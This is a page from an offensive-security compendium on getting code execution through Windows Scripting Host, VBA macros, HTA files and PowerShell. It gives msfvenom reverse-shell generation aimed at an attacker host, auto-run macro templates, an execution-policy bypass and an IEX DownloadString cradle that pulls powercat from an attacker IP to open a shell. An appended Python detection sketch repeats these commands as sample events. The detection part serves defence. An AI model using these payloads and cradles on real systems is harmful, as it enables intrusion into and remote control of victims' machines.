killchain-compendium/Exploits/Windows/Windows Scripting Host.md

# Windows Scripting Host (WSH)
## Visual Basic Script (VBScript)
* `cscript file.vbs`, command-line scripts (console host)
* `wscript file.vbs`, UI scripts (windowed host)
* Example (watch out for the whitespace after the `cmd.exe` path; it has to be included so that the script path is passed as a separate argument)
```vb
' Launch cmd.exe and hand it this script's own path as an argument.
' The trailing space after cmd.exe separates the executable from the argument.
' 0 = hidden window, True = wait for the process to exit
Set shell = WScript.CreateObject("WScript.Shell")
shell.Run "C:\Windows\System32\cmd.exe " & WScript.ScriptFullName, 0, True
```
* Run it with an explicit engine (`/e:`), which is why the file does not need a `.vbs` extension
```sh
c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
```
## Visual Basic for Applications (VBA)
* Access the Windows API via macros
* Open Word, `View` --> `Macros`, give a name and select the document in `Macros in`
* Create a reverse shell payload
```sh
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
```
* Insert it into the following macro content; `Workbook_Open()` is the auto-run hook for Excel, `Document_Open()` for Word macros
```vb
' Both auto-run hooks call the same routine, so the payload runs
' whichever open event the host application raises.
Sub Document_Open()
    SHELL
End Sub

Sub AutoOpen()
    SHELL
End Sub

Sub SHELL()
    <reverse shell goes here>
End Sub
```
## HTML Application (HTA)
* HTML file including some kind of scripting language like JS, VBScript or ActiveX
* `mshta.exe` is used to execute it
### POC
* Download the file via the attacker's web server
* The file should look like
```html
<html>
<body>
<script>
// WScript.Shell is reachable here because mshta runs the page with full trust
var shell = 'cmd.exe';
new ActiveXObject('WScript.Shell').Run(shell);
</script>
</body>
</html>
```
* For the VBA macro from the previous section, save the document in a macro-supporting file format like `Word 97-2003 Template` or `Word 97-2003 Document`
### Reverse Shell
* Craft a reverse shell via `msfvenom`
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta
```
* Or serve it from `msfconsole` via
```sh
use exploit/windows/misc/hta_server
```
## PowerShell
* The PowerShell execution policy can be checked via
```powershell
Get-ExecutionPolicy
```
* Set the policy via
```powershell
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
```
* Bypass via (`-ex` abbreviates `-ExecutionPolicy`; the execution policy is a safety feature against accidental script execution, not a security boundary)
```sh
powershell -ex bypass -File shell.ps1
```
* Host [powercat](https://github.com/besimorhino/powercat.git) on the attacker machine and load it on the target via
```sh
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
```
* Or use msfvenom
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1
```
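The techniques on this page share traits that show up in process-creation telemetry: an Office parent spawning a script host (VBA), `wscript`/`cscript` run with an explicit `/e:` engine on a file without a script extension (WSH), `mshta` pulling content over HTTP (HTA), and `powershell` invoked with an execution-policy bypass or an `IEX ... DownloadString` cradle. The following detection sketch is an added example, not part of the compendium; the `Event` fields, finding labels and sample events are this example's own assumptions, modelled on the commands above, and the sample lines are constructed rather than real logs.

```python
"""Added detection example (not part of the killchain-compendium page).

Scans constructed process-creation events for the WSH / VBA / HTA /
PowerShell execution patterns shown above. Field names, finding labels
and the sample events are assumptions of this example, modelled on the
commands in the page; they are not real logs.
"""
import os
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
# Extensions WSH normally handles; anything else combined with /e: is suspicious
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1"}


@dataclass
class Event:
    parent: str   # full path of the parent process image
    image: str    # full path of the created process image
    cmdline: str  # command line as logged


def basename(path: str) -> str:
    """Lower-cased file name portion of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tokens(cmdline: str) -> list:
    """Crude Windows command-line split that keeps double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def analyse(ev: Event) -> list:
    """Return the finding labels that apply to one event (empty list if benign)."""
    findings = []
    parent, img = basename(ev.parent), basename(ev.image)
    cl = ev.cmdline.lower()
    args = tokens(ev.cmdline)[1:]                        # drop argv[0]
    positional = [a for a in args if not a.startswith(("/", "-"))]

    # VBA: an Office application should rarely spawn a script host or shell.
    if parent in OFFICE_PARENTS and img in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")

    # WSH: /e:<engine> forces an interpreter, so the file need not carry a script extension.
    if img in {"wscript.exe", "cscript.exe"}:
        ext = os.path.splitext(basename(positional[0]))[1] if positional else ""
        if "/e:" in cl and ext not in SCRIPT_EXTS:
            findings.append("wsh-engine-override-on-nonscript-file")
        if "\\users\\" in cl:
            findings.append("wsh-script-in-user-profile")

    # HTA: mshta runs HTML applications with full trust; a URL argument means remote content.
    if img == "mshta.exe":
        findings.append("mshta-execution")
        if re.search(r"https?://", cl):
            findings.append("mshta-remote-hta")

    # PowerShell: execution-policy bypass switches and the IEX + DownloadString cradle.
    if img == "powershell.exe":
        if re.search(r"-(?:ex|ep|exec|executionpolicy)\s+bypass", cl):
            findings.append("ps-execution-policy-bypass")
        if re.search(r"\b(?:iex|invoke-expression)\b", cl) and "downloadstring" in cl:
            findings.append("ps-download-cradle")
    return findings


def scan(events) -> dict:
    """Map event index -> findings for every event that produced at least one finding."""
    out = {}
    for i, ev in enumerate(events):
        found = analyse(ev)
        if found:
            out[i] = found
    return out


# Constructed sample events mirroring the commands on this page (not real telemetry).
SAMPLE_EVENTS = [
    Event(r"C:\Program Files\Microsoft Office\WINWORD.EXE", r"C:\Windows\System32\wscript.exe",
          r"wscript /e:VBScript c:\Users\user\Documents\shell.txt"),
    Event(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
          "mshta http://<attacker-IP>:8000/shell.hta"),
    Event(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd\""),
    Event(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -ex bypass -File shell.ps1"),
    Event(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cscript.exe",
          r"cscript C:\Scripts\inventory.vbs"),   # benign admin script, should not alert
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(found)}")
```

The checks are deliberately narrow (exact image names, a handful of switches) so the benign `cscript` event produces nothing; in a real pipeline the parent/child pairing is the highest-signal rule, while the PowerShell switch and cradle matches need tuning against the environment's own administrative scripts.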